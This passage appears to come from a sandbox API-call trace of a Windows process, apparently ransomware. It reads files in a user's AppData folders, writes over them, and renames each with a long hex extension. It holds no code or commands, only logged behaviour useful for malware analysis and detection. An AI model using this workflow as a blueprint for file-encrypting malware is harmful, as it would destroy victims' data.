lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.353] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.366] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.366] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.366] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.367] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.367] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.368] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png", lpString2=".DAA2A038E9D74A3F1FACAAB379E3D72C791BA487B67D0F624A126921FD53917D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png.DAA2A038E9D74A3F1FACAAB379E3D72C791BA487B67D0F624A126921FD53917D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png.DAA2A038E9D74A3F1FACAAB379E3D72C791BA487B67D0F624A126921FD53917D" [0113.368] GetProcessHeap () returned 0x600000 [0113.368] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x315b4a8 [0113.368] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x315b4a8, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0113.369] CloseHandle (hObject=0x32c) returned 1 [0113.370] GetProcessHeap () returned 0x600000 [0113.370] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.370] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.372] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.372] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.373] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.374] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.382] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.383] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif", lpString2=".F8C4734ECEEFE4B8CCEAF249F1EBFFA27354ABFB0FA7B41D16D3CCB8DA4AC170" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif.F8C4734ECEEFE4B8CCEAF249F1EBFFA27354ABFB0FA7B41D16D3CCB8DA4AC170") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif.F8C4734ECEEFE4B8CCEAF249F1EBFFA27354ABFB0FA7B41D16D3CCB8DA4AC170" [0113.383] GetProcessHeap () returned 0x600000 [0113.383] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315b798 [0113.383] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x315b798, Length=0x170, FileInformationClass=0xa) returned 0x0 [0113.389] CloseHandle (hObject=0x32c) returned 1 [0113.390] GetProcessHeap () returned 0x600000 [0113.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.391] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.403] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0113.405] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.405] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0113.405] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png", lpString2=".463F4E82B31DD8810EA3E51D4FD14A98771970B154E0CA6A5AA0C831983F4F1C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png.463F4E82B31DD8810EA3E51D4FD14A98771970B154E0CA6A5AA0C831983F4F1C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png.463F4E82B31DD8810EA3E51D4FD14A98771970B154E0CA6A5AA0C831983F4F1C" [0113.405] GetProcessHeap () returned 0x600000 [0113.405] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315b910 [0113.405] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x27fff60, FileInformation=0x315b910, Length=0x170, FileInformationClass=0xa) returned 0x0 [0113.409] CloseHandle (hObject=0x330) returned 1 [0113.409] GetProcessHeap () returned 0x600000 [0113.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.411] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.445] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.445] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.446] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.446] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat", lpString2=".39680E22CDA671213C8CC5ED0A521C7AA036F23544E277629B3D6F46E321746E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat.39680E22CDA671213C8CC5ED0A521C7AA036F23544E277629B3D6F46E321746E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat.39680E22CDA671213C8CC5ED0A521C7AA036F23544E277629B3D6F46E321746E" [0113.446] GetProcessHeap () returned 0x600000 [0113.446] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318b358 [0113.446] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x27fff60, FileInformation=0x318b358, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0113.447] CloseHandle (hObject=0x330) returned 1 [0113.448] GetProcessHeap () returned 0x600000 [0113.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.449] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.521] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.524] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.525] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.526] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll", lpString2=".2DD98AC13F7AABC4F01E5188FE582AE12D32188855499B2351133A569C784003" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll.2DD98AC13F7AABC4F01E5188FE582AE12D32188855499B2351133A569C784003") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll.2DD98AC13F7AABC4F01E5188FE582AE12D32188855499B2351133A569C784003" [0113.526] GetProcessHeap () returned 0x600000 [0113.526] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315bc00 [0113.526] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x315bc00, Length=0x162, FileInformationClass=0xa) returned 0x0 [0113.529] CloseHandle (hObject=0x32c) returned 1 [0113.529] GetProcessHeap () returned 0x600000 [0113.529] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.530] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.535] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.535] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.535] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.536] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.549] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.550] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll", lpString2=".29221ADB1BE7785BD5883EE1EC7443DC6EFA82822663A05D21FC6F42AE26477C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll.29221ADB1BE7785BD5883EE1EC7443DC6EFA82822663A05D21FC6F42AE26477C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll.29221ADB1BE7785BD5883EE1EC7443DC6EFA82822663A05D21FC6F42AE26477C" [0113.550] GetProcessHeap () returned 0x600000 [0113.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x172) returned 0x318b048 [0113.550] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x318b048, Length=0x172, FileInformationClass=0xa) returned 0x0 [0113.557] CloseHandle (hObject=0x32c) returned 1 [0113.558] GetProcessHeap () returned 0x600000 [0113.558] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.559] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.572] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0113.573] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.576] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0113.576] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml", lpString2=".4C0A90D6EA3ADAC4DBC440919A17AEEFE2EB417D031075C50F14FD149932E339" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml.4C0A90D6EA3ADAC4DBC440919A17AEEFE2EB417D031075C50F14FD149932E339") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml.4C0A90D6EA3ADAC4DBC440919A17AEEFE2EB417D031075C50F14FD149932E339" [0113.576] GetProcessHeap () returned 0x600000 [0113.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315bd78 [0113.576] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x27fff60, FileInformation=0x315bd78, Length=0x170, FileInformationClass=0xa) returned 0x0 [0113.577] CloseHandle (hObject=0x330) returned 1 [0113.577] GetProcessHeap () returned 0x600000 [0113.578] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.579] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.179] ReadFile (in: hFile=0x32c, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0114.179] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.181] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x27fff70) returned 0x0 [0114.181] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log", lpString2=".A53A9E1022CC980B8E4127E1E24A3ED8D3D297404338D8717F3F28A2AD064518" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log.A53A9E1022CC980B8E4127E1E24A3ED8D3D297404338D8717F3F28A2AD064518") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log.A53A9E1022CC980B8E4127E1E24A3ED8D3D297404338D8717F3F28A2AD064518" [0114.181] GetProcessHeap () returned 0x600000 [0114.181] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x6b1000 [0114.181] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x6b1000, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0114.184] CloseHandle (hObject=0x308) returned 1 [0114.185] GetProcessHeap () returned 0x600000 [0114.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0114.185] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.190] WriteFile (in: hFile=0x338, lpBuffer=0x3338588*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3318450 | out: lpBuffer=0x3338588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3318450) returned 1 [0114.191] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.202] WriteFile (in: hFile=0x338, lpBuffer=0x680470, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 0x0 [0114.203] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.211] WriteFile (in: hFile=0x338, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0114.212] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.224] WriteFile (in: hFile=0x32c, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0114.225] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.394] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.394] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.399] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0114.400] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".323ADDFACB54F46EC7615D7DD6A4803F02D62EF6F2493DE0DDA0BC89518DEC17" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat.323ADDFACB54F46EC7615D7DD6A4803F02D62EF6F2493DE0DDA0BC89518DEC17") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat.323ADDFACB54F46EC7615D7DD6A4803F02D62EF6F2493DE0DDA0BC89518DEC17" [0114.400] GetProcessHeap () returned 0x600000 [0114.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x318e448 [0114.400] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x318e448, Length=0x186, FileInformationClass=0xa) returned 0x0 [0114.405] CloseHandle (hObject=0x324) returned 1 [0114.406] GetProcessHeap () returned 0x600000 [0114.406] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.407] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.478] ReadFile (in: hFile=0x31c, lpBuffer=0x680470, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0114.478] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.479] WriteFile (in: hFile=0x31c, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0114.481] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.482] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x27fff70) returned 0x0 [0114.482] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".2FFBBC8527AAEB0677B791804128724AF2FE098B45397BEAB0077D77E1DB0057" | out: 